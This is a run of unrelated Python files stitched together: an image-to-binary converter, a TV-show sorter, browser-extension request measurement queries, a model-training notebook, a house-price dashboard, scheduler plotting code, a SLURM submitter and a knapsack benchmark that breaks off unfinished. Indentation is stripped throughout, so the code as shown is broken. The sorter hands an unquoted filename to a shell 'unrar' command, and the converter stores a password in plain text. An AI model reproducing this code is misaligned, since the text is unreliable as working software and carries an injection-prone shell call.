fl=str("v0-"+str(len(d)))+".bin"
file = open("img/"+fl,"wb")
print(len(d))
for i in range(len(d)):
for j in range(len(d[i])):
hex_string = d[i][j]
#print(hex_string)
try :
a=bytearray.fromhex(hex_string)
except:
#print(hex_string)
pass
if j==0 and i==0 and nnn==0:
nnn=1
zer=bytearray.fromhex("49424d505f76")
file.write(zer)
ba=hex(len(d))
ba=ba[2:]
if len(ba)==1:ba="0"+ba
bb=hex(v)
bb=bb[2:]
if len(bb)==1:bb="0"+bb
file.write(bytearray.fromhex(ba))
file.write(bytearray.fromhex(bb))
if q==0:
zer=bytearray.fromhex("00")
elif q==1 :
zer=bytearray.fromhex("01")
file.write(zer)
file.write(a)
file.close()
return None
data,n_img=main()
issec=0
vid=0
b=input("secur ? [y/n]\n")
if b == "y":
issec=1
print("secur : on\n")
mpd = input("password ? use digit ['0123456789'] (8 pin max) \n")
try :
if len(mpd)>8:
print("error\n")
os.wait(2)
exit()
f_mpd=int(mpd)
print(f_mpd)
file2 = open("img/pass.bin","w")
zer="IBMP_s\x20\x20"
file2.write(zer)
file2.write(str(f_mpd))
file2.close()
print("\nok\n")
except :
print("error\n")
os.wait(2)
exit()
a=input("video : y/n\n")
if a == "y" :
b=input("frame delay (ms)\n")
try :
vid = int(b)
if vid > 255:
vid=255
print(" >> 255 (val max)\n")
print("ok\n")
except :
print("error\n")
os.wait(2)
exit()
ar2bin_v(data,issec,vid)
else :
print("\npicture\n")
ar2bin(data,issec)
print("\nend \t DONE\n")
os.system("pause")
|
#!/usr/bin/python3
a, b = 0, 10
while a < b:
print(a)
a = a + 1
print('Done') #Here this line also is a part of While loop
for i in range(1,10):
print(i)
#Example of iterating through array
bridgera = ['Arijit','Soumya','Gunjan','Arptia','Bishwa','Rintu','Satya','Lelin']
for i in range(len(bridgera)):
print(i,bridgera[i]) |
from collections import defaultdict
import tldextract
from extensionanalysis import chromecast_extension_ids
from query import Query
class QueryWar(Query):
def query_war_schemes(self) -> list:
"""Get the number of WAR requests and the number of websites performing WAR requests grouped per URL scheme"""
results = []
schemes = [".*", "^chrome-extension://", "^moz-extension://", "^opera-extension://", "^ms-browser-extension://", "^chrome://"]
for scheme in schemes:
count = self.db.execute_sql(
sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* %(scheme)s;",
params={"scheme": (scheme,)}
).fetchone()
results.append({"scheme": scheme.replace("^", "").replace("://", ""), "requests": count[0], "websites": count[1]})
# Get count for chrome-extension:// with Chrome Media Router only
count_wo_cast = self.db.execute_sql(
sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* '^chrome-extension://' AND requested_extension_id IN %(chromecast_extension_ids)s;",
params={"chromecast_extension_ids": tuple(chromecast_extension_ids)}
).fetchone()
results.append({"scheme": "chrome-extension (Chrome Media Router only)", "requests": count_wo_cast[0], "websites": count_wo_cast[1]})
# Get count for chrome-extension:// with Chrome Media Router only requests excluded
count_wo_cast = self.db.execute_sql(
sql="SELECT COUNT(requested_war), COUNT(DISTINCT website_id) FROM warrequest WHERE requested_war ~* '^chrome-extension://' AND requested_extension_id NOT IN %(chromecast_extension_ids)s;",
params={"chromecast_extension_ids": tuple(chromecast_extension_ids)}
).fetchone()
results.append({"scheme": "chrome-extension (Chrome Media Router excluded)", "requests": count_wo_cast[0], "websites": count_wo_cast[1]})
return results
def query_war_requested_extensions(self) -> dict:
query = """
SELECT
requested_extension_id,
COUNT(requested_extension_id) AS request_count,
COUNT(DISTINCT (requested_extension_id || website_id)) AS request_count_clean
FROM
warrequest
GROUP BY
requested_extension_id
ORDER BY
request_count_clean DESC;
"""
return self._query_extensions(query)
def query_websites_with_war_requests(self) -> list:
websites = []
# Get website URLs together with the number of distinct requested extensions and the number of requested WARs
cursor = self.db.execute_sql("""
SELECT
website.id,
website.url,
COUNT(DISTINCT requested_extension_id) AS distinct_extensions_requested_count,
COUNT(requested_extension_id) AS requested_wars_count
FROM
warrequest, website
WHERE
website.id = warrequest.website_id
GROUP BY
website.id, website.url
ORDER BY
distinct_extensions_requested_count DESC;
""")
for website_id, url, distinct_extensions_requested_count, requested_wars_count in cursor.fetchall():
website = {
"id": website_id,
"url": url,
"distinct_extensions_requested_count": distinct_extensions_requested_count,
"requested_wars_count": requested_wars_count,
"requests": []
}
if distinct_extensions_requested_count > 5:
website["requests"] = self.query_war_requests_for_website(website_id)
websites.append(website)
return websites
def query_war_requests_for_website(self, website_id: int) -> list:
cursor = self.db.execute_sql("""
SELECT requested_extension_id, requested_war, get_initiator(request_object) FROM warrequest WHERE website_id = %s;
""", (website_id,))
requests = []
for requested_extension_id, requested_war, initiator in cursor.fetchall():
requests.append({
"requested_extension_id": requested_extension_id,
"requested_war": requested_war,
"initiator": initiator
})
return requests
def query_war_requests_with_initiators(self) -> list:
"""Get a list of dicts of WAR requests. Contains the requested extension_id, website_id and
the request initiator. Chromecast requests are excluded.
"""
war_requests = []
cursor = self.db.execute_sql("""
SELECT
requested_extension_id,
website_id,
get_initiator(request_object)
FROM warrequest
WHERE requested_extension_id NOT IN ('pkedcjkdefgpdelpbcmbmeomcjbeemfm', 'enhhojjnijigcajfphajepfemndkmdlo')
;
""")
for extension_id, website_id, initiator_url in cursor.fetchall():
initiator_domain = tldextract.extract(initiator_url).registered_domain
war_requests.append({
"extension_id": extension_id,
"website_id": website_id,
"initiator": initiator_domain
})
return war_requests
def query_war_extensions_requested_together(self) -> dict:
"""Get the ids of the requested extensions without duplicates for each website. Chromecast requests are excluded.
:return: e.g. {"198542": ["pkedcjkdefgpdelpbcmbmeomcjbeemfm","enhhojjnijigcajfphajepfemndkmdlo"]}
"""
wars = defaultdict(list)
cursor = self.db.execute_sql("SELECT website_id, requested_extension_id FROM warrequest WHERE requested_extension_id NOT IN ('pkedcjkdefgpdelpbcmbmeomcjbeemfm', 'enhhojjnijigcajfphajepfemndkmdlo');")
for website_id, requested_extension_id in cursor.fetchall():
if requested_extension_id not in wars[website_id]:
wars[website_id].append(requested_extension_id)
return dict(wars)
def query_war_request_3rd_party(self) -> dict:
"""Returns websites that perform WAR requests grouped by request source (same/3rd party domain/YouTube).
If a websites performs multiple request, only one is counted (per category)."""
# Use sets to ensure that websites are only counted once
websites = {
"same_domain": set(),
"other_domain": set(),
"youtube": set()
}
query_string = "SELECT website_id, url, get_initiator(request_object) AS initiator FROM warrequest, website WHERE warrequest.website_id = website.id;"
cursor = self.db.execute_sql(query_string)
for website_id, url, req_url in cursor.fetchall():
website_domain = tldextract.extract(url).registered_domain
request_source_domain = tldextract.extract(req_url).registered_domain
if request_source_domain in ["youtube.com", "youtube-nocookie.com"]:
websites["youtube"].add(url)
elif website_domain != request_source_domain:
websites["other_domain"].add(url)
else:
websites["same_domain"].add(url)
return websites
def query_war_request_f5(self):
""" Gather information on WAR requests where the initiator URL contains the string '/TSPD/'
which indicates that a F5 Big IP appliance is used.
"""
query_string = "SELECT COUNT(id) AS request_count, COUNT(DISTINCT website_id) AS distinct_websites_count, COUNT(DISTINCT requested_extension_id) distinct_extensions_count FROM warrequest WHERE get_initiator(request_object) LIKE '%%/TSPD/%%';"
result = self.db.execute_sql(query_string).fetchone()
return {
"request_count": result[0],
"distinct_websites_count": result[1],
"distinct_extensions_count": result[2]
}
|
#!/usr/bin/python
# tv_sort.py
# detects and sorts tv shows automatically based on filename
import os
import shutil
import re
import xmlrpclib
words = r'([\'\w\.\- ]+?)'
spacers = re.compile(r'[\s_\-\.]+')
show_filename = re.compile(words + r'S(\d+)\s?EP?(\d+)', re.IGNORECASE)
show_filename_2 = re.compile(words + r'(\d{4}\.[012]?[0-9]\.\d{1,2})()', re.IGNORECASE)
show_filename_3 = re.compile(words + r'(\d+)x(\d+)', re.IGNORECASE)
show_filename_4 = re.compile(words + r'(\d+?)(\d{1,2})', re.IGNORECASE)
word_match = re.compile('(%s+)' % words, re.IGNORECASE)
the_match = re.compile(r'(.*?)(, The)$', re.IGNORECASE)
hd_match = re.compile(r'(720p|1080p)')
date = r'(19\d{2}|2\d{3})'
date_match = re.compile(r' ?(\(%s\)|%s) ?' % (date, date))
extensions = ('.mp4', '.avi', '.mkv', '.m4v', '.wmv', '.mpg', '.mpeg')
def forward_the(name):
if the_match.match(name):
return the_match.sub(r'The \1', name)
return name
class Auto(dict):
def __init__(self, path):
self.path = path
if os.path.isfile(path):
f = open(path, 'r')
for line in f.readlines():
line = line.strip()
if line and ':' in line:
key, value = line.split(':', 1)
key, value = key.strip(), value.strip()
value = value.strip('\'"')
self[key] = value
class Folder:
def __init__(self, path):
self.path = path
self.name = os.path.split(path)[1]
self.regex = None
self.naming = 'Season %(season)s/%(name)s %(epstr)s'
self.auto = Auto(os.path.join(path, '.auto'))
if 'regex' in self.auto:
try:
self.regex = re.compile(self.auto['regex'], re.IGNORECASE)
except:
print 'error parsing regex for: %s' % self.auto.path
if 'name' in self.auto:
self.naming = self.auto['name']
if not self.regex:
# TODO: this is terrible for single-letter names
text = word_match.match(self.name).group()
text = spacers.sub(' ', text)
self.regex = re.compile(re.escape(text), re.IGNORECASE)
def match(self, name):
match = self.regex.search(name)
if match:
return True
return False
def rename(self, name, season, episode, hd=None, ext='.avi'):
if season and episode:
season = int(season)
episode = int(episode)
epstr = 'S%02dE%02d' % (season, episode)
else:
epstr = season
if not self.auto:
self.naming = '%(name)s %(epstr)s'
target = self.naming % {'name':name, 'season':season, 'episode':episode, 'epstr':epstr}
if hd:
target = '%s (%s)' % (target, hd)
return self.path, target + ext, epstr
def __repr__(self):
return '<Folder "%s">' % self.name
def extract(path):
cwd = os.getcwd()
os.chdir(path)
first = os.listdir('.')
for entry in first:
if entry.endswith('.rar'):
print 'Extracting: %s' % entry,
os.popen('unrar x -o- %s' % entry)
break
second = os.listdir('.')
for entry in second:
ext = os.path.splitext(entry)[1]
if ext in extensions:
print '=> "%s"' % entry
os.chdir(cwd)
return entry, ext
else:
print '- Nothing found :('
os.chdir(cwd)
return None, None
def move(path, filename, name, season, episode, folders, force_move=False, dry_run=False, link=False, hd=None, ext='.avi'):
copy = True
for folder in folders:
if folder.match(name):
break
else:
print 'Skipped "%s" (example: %s)' % (name, filename)
return True
target_folder, target, epstr = folder.rename(name, season, episode, hd, ext)
no_ext = os.path.splitext(os.path.join(target_folder, target))[0]
test_base = os.path.split(no_ext)[0]
for test in extensions:
test_path = no_ext + test
test_filename = os.path.split(test_path)[1]
if not os.path.exists(test_base):
if not dry_run:
os.makedirs(test_base)
break
else:
if test_base == path:
if test_filename == filename:
return
else:
for existing in os.listdir(test_base):
if existing.lower() == test_filename.lower():
return
path = os.path.join(path, filename)
if not os.path.exists(path):
return
if os.path.isdir(path) and not dry_run:
entry, ext = extract(path)
if not entry:
print 'no extracted file found.'
return
else:
print 'success.'
path = os.path.join(path, entry)
copy = False
target_folder, target, epstr = folder.rename(name, season, episode, hd, ext)
target_path, target_filename = os.path.split(os.path.join(target_folder, target))
print ('%s %s => %s' % (name, epstr, target)),
target = os.path.join(target_folder, target)
if dry_run:
verb = copy and 'copy' or 'move'
print 'Would %s %s => %s' % (verb, path, target)
else:
if copy and not force_move:
if link:
try:
os.link(path, target)
print 'linked to target'
except IOError:
link = False
if not link:
shutil.copyfile(path, target)
print 'copied to target.'
else:
os.rename(path, target)
print 'moved to target.'
def run(source, targets, force_move=False, dry_run=False, link=False):
print
print 'If anything is skipped, make sure the show name exists as a folder in one of the targets'
print 'You can also use .auto files (see the readme) to change the show matching a folder'
folders = []
for target in targets:
if not os.path.isdir(target): continue
for folder in os.listdir(target):
path = os.path.join(target, folder)
if not os.path.isdir(path): continue
folders.append(Folder(path))
files = set()
if source.startswith('rtorrent://'):
rtorrent_uri = source.replace('rtorrent', 'http')
x = xmlrpclib.ServerProxy(rtorrent_uri)
seeding = x.download_list()
for torrent in seeding:
if not x.d.complete(torrent): continue
files.add(x.d.get_base_path(torrent))
else:
for filename in os.listdir(source):
files.add(os.path.join(source, filename))
skip = set()
for path in sorted(files):
path, filename = os.path.split(path)
cleaned_filename = hd_match.sub('', filename)
match1 = show_filename.match(cleaned_filename)
match2 = show_filename_2.match(cleaned_filename)
match3 = show_filename_3.match(cleaned_filename)
match4 = show_filename_4.match(cleaned_filename)
hd = hd_match.search(filename)
if hd:
hd = hd.group()
matches = [m for m in (match1, match2, match3, match4) if m]
if matches:
match = matches[0]
name, season, episode = match.groups()
# replace all spacer chars with spaces
name = spacers.sub(' ', name)
# strip the year from the name
name = date_match.sub(' ', name)
name = name.strip()
first = name[0]
if first == first.lower():
name = ' '.join(word.capitalize() for word in name.split(' '))
if name in skip: continue
if name.endswith(' S'):
# work around a bug when encountering full season downloads
continue
skip_name = move(path, filename, name, season, episode, folders, force_move, dry_run, link, hd)
if skip_name:
skip.add(name)
def usage():
print 'Usage: ./tv_sort.py [flags] <source> <target folder> [target folder] [target folder]...'
print 'Sorts TV shows into folders.'
print ' Flags:'
print ' -m, --move: force moving of normal files (extracted files are always moved)'
print ' -l, --link: hardlink files instead of copying'
print ' -d, --dry: dry run - only display what would be moved/copied'
print ' Source options:'
print ' * /path/to/folder'
print ' * rtorrent://localhost/scgi_path'
sys.exit(1)
if __name__ == '__main__':
import sys
args = []
force_move = False
dry_run = False
link = False
for arg in sys.argv[1:]:
sort = None
if arg.startswith('-'):
sort = ''.join(sorted(arg))
if arg in ('-m', '--move'):
force_move = True
elif arg in ('-d', '--dry'):
dry_run = True
elif arg in ('-l', '--link'):
link = True
elif sort:
if re.match(r'-[mdv]{1,3}', sort):
if 'm' in sort: force_move = True
if 'd' in sort: dry_run = True
if 'l' in sort: link = True
else:
args.append(arg)
if len(args) < 2:
usage()
else:
run(args[0], args[1:], force_move=force_move, dry_run=dry_run, link=link)
|
# Train a model
# +
import pickle
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.ensemble import RandomForestClassifier
from sklearn_evaluation import plot
# + tags=["parameters"]
upstream = ['join']
product = None
# -
df = pd.read_parquet(str(upstream['join']))
X = df.drop('target', axis='columns')
y = df.target
X_train, X_test, y_train, y_test = train_test_split(X,
y,
test_size=0.33,
random_state=42)
clf = RandomForestClassifier()
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print(classification_report(y_test, y_pred))
plot.confusion_matrix(y_test, y_pred)
with open(product['model'], 'wb') as f:
pickle.dump(clf, f)
|
# importar pacotes
import pandas as pd
import pydeck as pdk
import streamlit as st
# import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
# from datetime import date
# carregar os meus dados
df = pd.read_csv('kc_dataset_clean.csv')
# dashboard
st.title("Casas em Seattle")
st.markdown(
"""
Empresas imobiliárias online oferecem avaliações de casas usando técnicas de aprendizado de máquina.
O objetivo deste relatório é analisar as vendas de casas em King County, Seattle, Estado de Washington, EUA,
usando técnicas de ciência de dados. O conjunto de dados consiste em dados históricos de casas vendidas
entre maio de 2014 a maio de 2015.
"""
)
df['y/m'] = df['date'].apply(lambda x: str(x)[:7])
# sidebar
st.sidebar.info("Foram carregadas {} linhas.".format(df.shape[0]))
if st.sidebar.checkbox("Ver dados de preço por número de quartos"):
fig = plt.figure(figsize=(15, 12))
plt.title('Média de preço de casa por número de quartos', fontsize=33)
plt.ylabel('price', fontsize=22)
plt.xlabel('bedrooms', fontsize=22)
media_quarto = df[['bedrooms', 'price']].groupby('bedrooms').mean().reset_index()
sns.barplot(x='bedrooms', y='price', data=media_quarto)
st.write(fig)
if st.sidebar.checkbox("Média de preço de casa por notas"):
fig = plt.figure(figsize=(15, 12))
plt.title('Média de preço de casa por notas', fontsize=33)
plt.ylabel('price', fontsize=22)
plt.xlabel('grade', fontsize=22)
media_nota = df[['grade', 'price']].groupby('grade').mean().reset_index()
sns.barplot(x='grade', y='price', data=media_nota)
st.write(fig)
if st.sidebar.checkbox("Evolução dos preços em 1 ano"):
fig = plt.figure(figsize=(15, 12))
plt.title('Evolução dos preços em 1 ano', fontsize=33)
plt.ylabel('', fontsize=22)
plt.xlabel('', fontsize=22)
media_preco = df[['y/m', 'price']].groupby('y/m').mean().reset_index()
media_preco['growth_price'] = 100 * media_preco['price'].pct_change()
sns.barplot(x='y/m', y='growth_price', data=media_preco)
plt.xticks(rotation=45)
st.write(fig)
if st.sidebar.checkbox("Média de preços por mês em 1 ano"):
fig = plt.figure(figsize=(15, 12))
plt.title('Média de preços por mês', fontsize=33)
plt.ylabel('', fontsize=22)
plt.xlabel('', fontsize=22)
sns.barplot(x='y/m', y='price', data=df)
st.write(fig)
df.date = pd.to_datetime(df.date)
ano_selecionado = st.sidebar.slider("Selecione um ano", 2014, 2015)
df_selected = df[df.date.dt.year == ano_selecionado]
st.subheader('Mapa da cidade de Seattle')
# st.map(df)
st.pydeck_chart(pdk.Deck(
initial_view_state=pdk.ViewState(
latitude=47.608013,
longitude=-122.335167,
zoom=7.5,
min_zoom=3,
max_zoom=15,
pitch=40.5,
bearing=-27.36
),
layers=[
pdk.Layer(
'HexagonLayer',
data=df_selected[['lat', 'lon']], # df
get_position='[lon,lat]',
radius=150,
auto_highlight=True,
elevation_scale=25,
pickable=False, # Interfere na manipulação do mapa.
elevation_range=[0, 3000],
extruded=True,
stroked=True,
filled=True,
wireframe=True
)
],
))
|
#!/usr/bin/env python3
#
# Copyright 2019 Peifeng Yu <peifeng@umich.edu>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -*- coding: utf-8 -*-
"""
Created on Sun Sep 2 04:25:58 2018
@author: peifeng
"""
from __future__ import print_function, absolute_import, division
import re
from datetime import datetime
from collections import defaultdict
import multiprocessing as mp
from pathlib import Path
import subprocess as sp
import tempfile
import pandas as pd
#import seaborn as sns
import numpy as np
import matplotlib.pyplot as plt
import plotutils as pu
import compmem as cm
def load_case(path):
df = pd.read_csv(path, header=None, sep=' ',
names=['date', 'time', 'event', 'skip', 'Model'],
parse_dates=[['date', 'time']])
df = df[['date_time', 'event', 'Model']]
df['timestamp'] = df['date_time']
df = df.drop('date_time', axis=1)
wls = df.pivot_table(values='timestamp', index=['Model'],
columns='event', aggfunc='first').reset_index()
for col in ['Started', 'Queued', 'Finished']:
wls[col] = wls[col].str[:-1]
wls[col] = pd.to_datetime(wls[col])
wls['queuing'] = wls.Started - wls.Queued
wls['JCT'] = wls.Finished - wls.Queued
# for convinent
wls['No'] = pd.to_numeric(wls['Model'].str.rpartition('.')[2])
return wls
def load_trace(path, fifo=True):
df = pd.read_csv(path)
df = df.sort_values(by='submit_time')
if fifo:
models = defaultdict(dict)
curr = 0
for idx, row in df.iterrows():
if curr < row['submit_time']:
curr = row['submit_time']
models[idx]['Queued'] = row['submit_time']
models[idx]['Started'] = curr
curr += row['duration']
models[idx]['Finished'] = curr
data = [
{
"Model": '{model_name}.tf.{iterations}iter.{job_id}'.format(**df.iloc[idx]),
"Finished": m['Finished'],
"Queued": m['Queued'],
"Started": m['Started'],
"queuing": m['Started'] - m['Queued'],
"JCT": m['Finished'] - m['Queued']
}
for idx, m in models.items()
]
df = pd.DataFrame(data)
else:
data = [
{
"Model": f"{row.model_name}.tf.{row.iterations}iter.{row.job_id}",
"Finished": row.submit_time + row.duration,
"Queued": row.submit_time,
"Started": row.submit_time,
"queuing": 0,
"JCT": row.duration
}
for idx, row in df.iterrows()
]
df = pd.DataFrame(data)
for col in ['Finished', 'Queued', 'Started', 'queuing', 'JCT']:
df[col] = pd.to_timedelta(df[col], unit='s')
df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
return df
def load_refine(pathdir):
# load preempt select events
with tempfile.NamedTemporaryFile() as f:
server_output = pathdir/'server.output'
sp.check_call(['grep', 'preempt_select_sess', str(server_output)], stdout=f)
f.flush()
df = cm.load_generic(f.name, event_filters=['preempt_select_sess'])
df = df.drop(['evt', 'level', 'loc', 'thread', 'type'], axis=1)
# convert UTC from server to local
df['timestamp'] = df.timestamp.dt.tz_localize('UTC').dt.tz_convert('US/Eastern').dt.tz_localize(None)
sess2Model = {}
# model name -> sess handle
ptn = re.compile('Created session with handle (?P<sess>.+)$')
for fpath in pathdir.glob('*.*.*.*.output'):
with fpath.open() as f:
for line in f:
m = ptn.search(line)
if m:
sess2Model[m.group('sess')] = fpath.name.rstrip('.output')
# add model name info to it
df['Model'] = df.Sess.map(sess2Model)
# make sure every session is covered
assert df.Model.isnull().sum() == 0
# for convinent
df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
return df
def load_serverevents(pathdir):
# sess handle -> lane id
with tempfile.NamedTemporaryFile() as f:
server_output = pathdir/'server.output'
sp.check_call(['grep', 'lane_assigned', str(server_output)], stdout=f)
f.flush()
df = cm.load_generic(f.name, event_filters=['lane_assigned'])
df = df.drop(['evt', 'level', 'loc', 'thread', 'type'], axis=1)
# sess handles are unique
assert len(df.Sess.unique()) == len(df.Sess)
# make Sess as index so we can lookup
df = df.set_index('Sess')
# add a new column
df['Model'] = None
# model name -> sess handle
ptn = re.compile('Created session with handle (?P<sess>.+)$')
for fpath in pathdir.glob('*.*.*.*.output'):
with fpath.open() as f:
for line in f:
m = ptn.search(line)
if m:
df.loc[m.group('sess'), 'Model'] = fpath.name.rstrip('.output')
# reset index so we can use that later
df = df.reset_index()
return df
def refine_time_events(df, sevts):
"""Return a copy of df"""
assert df.Model.is_unique
assert sevts.Model.is_unique
df = df.set_index('Model').sort_index()
sevts = sevts.set_index('Model').sort_index()
# check sevts contains all needed info
assert sevts.index.equals(df.index)
# Server logs in UTC, convert to local
sevts['Started'] = sevts.timestamp.dt.tz_localize('UTC').dt.tz_convert('US/Eastern').dt.tz_localize(None)
sevts = sevts.drop(['timestamp'], axis=1)
df['Queued'] = df.Started
df = df.drop(['Started'], axis=1)
# set Model as index for both as then and then concat
df = pd.concat([df, sevts], axis=1)
# update queuing
df['queuing'] = df.Started - df.Queued
return df.reset_index()
def plot_timeline(df, colors=None, **kwargs):
ax = kwargs.pop('ax', None)
if ax is None:
ax = plt.gca()
# sort df by no
df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
df = df.sort_values(by='No')
offset = df.Queued.min()
qmin = (df.Queued - offset) / pd.Timedelta(1, unit='s')
xmin = (df.Started - offset) / pd.Timedelta(1, unit='s')
xmax = (df.Finished - offset) / pd.Timedelta(1, unit='s')
if colors is None:
color_cycle = ax._get_lines.prop_cycler
colors = [next(color_cycle)['color'] for _ in qmin]
for (_, row), q, left, right, color in zip(df.iterrows(), qmin, xmin, xmax, colors):
barheight = 0.8
# queuing time
ax.barh(row.No, left - q, barheight, q, color='#b6b6b6')
# run time
bar = ax.barh(row.No, right - left, barheight, left,
color=color,
label='#{3}: {0}'.format(*row.Model.split('.')))
if 'LaneId' in row:
ax.text(right + 2, row.No, f'Lane {row.LaneId}',
ha='left', va='center', fontsize=3)
# ax.legend()
ax.set_xlabel('Time (s)')
# ax.set_ylabel('Workload')
ax.yaxis.set_ticks([])
return bar, colors
def plot_refine(ax, df, refine_data):
# so that we can access job using no
df = df.set_index('No')
# for every preempt event pair, mask jobs that's not the left event's switch_to job
offset = df.Queued.min()
refine_data['Ntime'] = (refine_data['timestamp'] - offset) / pd.Timedelta(1, unit='s')
# also convert df.Queued to relative time
df['Started'] = (df.Started - offset) / pd.Timedelta(1, unit='s')
df['Finished'] = (df.Finished - offset) / pd.Timedelta(1, unit='s')
bars = []
# group refine_data by laneId
for laneId, grp in refine_data.groupby('LaneId'):
magic = grp.iterrows()
next(magic)
for (_, left), (_, right) in zip(grp.iterrows(), magic):
for no in df.index.unique():
if no == left.No:
continue
if laneId != df.loc[no].LaneId:
continue
l = max(df.loc[no].Started, left.Ntime)
r = min(df.loc[no].Finished, right.Ntime)
if l >= r:
continue
# make sure left and right within job no's started and finished
# mask from left to right
bars.append(ax.barh(no, r - l, 0.5, l, color='#ffffff', edgecolor='#ffffff'))
return bars
def plot_lanes(refined_df, **kwargs):
lanes = refined_df.groupby(['LaneId', 'LaneSize']).agg({
'Queued': 'first',
'Finished': 'last'
}).rename(columns={'Queued':'Started'}).reset_index()
tables = []
for col in ['Started', 'Finished']:
t = lanes.pivot_table(values='LaneSize', columns='LaneId', index=[col], aggfunc='first')
tables.append(t)
lanes2 = pd.concat(tables).sort_index().interpolate(method='linear', limit_area='inside').fillna(0)
# x
x = (lanes2.index - lanes2.index.min()) / pd.Timedelta(1, 's')
# ys
ys = [lanes2[col].tolist() for col in lanes2.columns]
plt.stackplot(x, *ys)
def plot_jcts(df, fifo, **kwargs):
ax = pu.cdf(df.JCT.dt.total_seconds(), label='SRTF')
ax = pu.cdf(fifo.JCT.dt.total_seconds(), label='FIFO', ax=ax)
ax.set_xlabel('JCT (s)')
ax.set_ylabel('CDF')
ax.legend()
return ax
path = '/tmp/workspace'
def prepare_paper(path):
with plt.style.context(['seaborn-paper', 'mypaper']):
path = Path(path)/'card266'/'salus'
df = load_case(path/'card266.output')
fifo = load_trace(path/'trace.csv')
refine_data = load_refine(path)
sevts = load_serverevents(path)
df = refine_time_events(df, sevts)
fig, axs = plt.subplots(nrows=2, sharex=True)
fig.set_size_inches(3.25, 2.35, forward=True)
_, colors = plot_timeline(fifo, ax=axs[0], linewidth=2.5)
axs[0].set_ylabel('FIFO')
axs[0].legend().remove()
axs[0].set_xlabel('')
plot_timeline(df.drop(['LaneId'], axis=1), ax=axs[1], linewidth=2.5, colors=colors)
plot_refine(axs[1], df, refine_data)
axs[1].set_ylabel('Salus')
fig.subplots_adjust(bottom=0.35)
axs[1].legend(loc="upper center", frameon=False,
bbox_to_anchor=[0.5, -0.8],
#bbox_transform=fig.transFigure,
fontsize='x-small',
ncol=3
#mode='expand'
)
fig.tight_layout()
fig.savefig('/tmp/workspace/card266.pdf', dpi=300)
|
from os.path import join
import logging
from glob import glob
from vcstools.config import load_config_file
from vcstools.job_submit import submit_slurm
from dpp.helper_files import glob_pfds
comp_config = load_config_file()
logger = logging.getLogger(__name__)
def submit_prepfold_products_db(cfg, dep_id=None, dep_type="afterany"):
"""Submits the best fold profile to the pulsar database. Will also submit .ppps"""
my_pointing = cfg["source"]["my_pointing"]
# We will upload the init fold and the best post fold
bin_list = list(cfg["folds"][my_pointing]["init"].keys())
bin_list.append(cfg["source"]["my_bins"])
jids = []
for bin_count in bin_list:
commands = []
commands.append(f"cd {cfg['files']['psr_dir']}")
# Get the files to upload
try:
ppps = glob_pfds(cfg, my_pointing, bin_count, pfd_type=".ps")[0]
except IndexError as e:
raise IndexError(f"No ppps files found in dir: {cfg['files']['psr_dir']} for pointing {my_pointing} and bin count {bin_count}")
try:
bestprof = glob_pfds(cfg, my_pointing, bin_count, pfd_type=".bestprof")[0]
except IndexError as e:
raise IndexError(f"No bestprof files found in dir: {cfg['files']['psr_dir']} for pointing {my_pointing} and bin count {bin_count}")
commands.append(f"echo 'Submitting profile to database with {bin_count} bins'")
commands.append(f"submit_to_database.py -o {cfg['obs']['id']} --cal_id {cfg['obs']['cal']} -p {cfg['source']['name']} --bestprof {bestprof} --ppps {ppps}")
# Submit this job
name = f"Submit_db_{cfg['files']['file_precursor']}_{bin_count}"
batch_dir = join(comp_config['base_data_dir'], cfg['obs']['id'], "batch")
this_id = submit_slurm(name, commands,
batch_dir=batch_dir, slurm_kwargs={"time": "00:30:00"}, depend=dep_id,
module_list=[f"mwa_search/{cfg['run_ops']['mwa_search']}"],
vcstools_version=cfg["run_ops"]["vcstools"], submit=True, depend_type=dep_type)
jids.append(this_id)
logger.info(f"Submission script on queue for profile: {bestprof}")
logger.info(f"Job Name: {name}")
logger.info(f"Job ID: {this_id}")
cfg["completed"]["upload"] = True
return jids |
import knapsack
import time
"""
This script is used to debug the knapsack solver in python/knapsack.py
"""
def main():
# setup libknapsack object
capacity = 5
ks = knapsack.Knapsack(capacity)
# add items to knapsack
ks.addItem(3,10)
ks.addItem(1,2)
ks.addItem(2,2)
ks.addItem(1,3)
# benchmark first small example
ks.setCapacity(5);
ks.addItem(3,10);
ks.addItem(1,2);
ks.addItem(2,2);
ks.addItem(1,3);
start = time.clock()
result = ks.solve()
duration_small_one = (time.clock()-start)
print "cap: 5, items: 4. took: ", duration_small_one, " seconds."
# benchmark second small example
ks.setCapacity(7);
ks.addItem(3,10)
ks.addItem(2,1);
start = time.clock()
result = ks.solve()
duration_small_two = (time.clock()-start)
print "cap: 7, items: 6. took: ", duration_small_two, " seconds."
# benchmark first medium example
ks.setCapacity(89);
ks.addItem(3,14);
ks.addItem(2,1);
ks.addItem(3,30);
ks.addItem(2,14);
ks.addItem(3,10);
ks.addItem(5,6);
ks.addItem(42,10);
ks.addItem(7,23);
ks.addItem(9,10);
ks.addItem(1,3);
ks.addItem(4,10);
ks.addItem(32,7);
ks.addItem(3,10);
ks.addItem(1,2);
ks.addItem(6,10);
ks.addItem(3,54);
ks.addItem(3,12);
ks.addItem(5,13);
ks.addItem(51,11);
ks.addItem(4,42);
ks.addItem(9,52);
ks.addItem(24,2);
ks.addItem(4,10);
ks.addItem(63,17);
start = time.clock()
result = ks.solve()
duration_medium_two = (time.clock()-start)
print "cap: 89, items: 30. took: ", duration_medium_two, " seconds."
# benchmark second medium example
ks.setCapacity(102);
ks.addItem(3,13);
ks.addItem(53,10);
ks.addItem(4,42);
ks.addItem(23,62);
ks.addItem(1,19);
start = time.clock()
result = ks.solve()
duration_medium_two = (time.clock()-start)
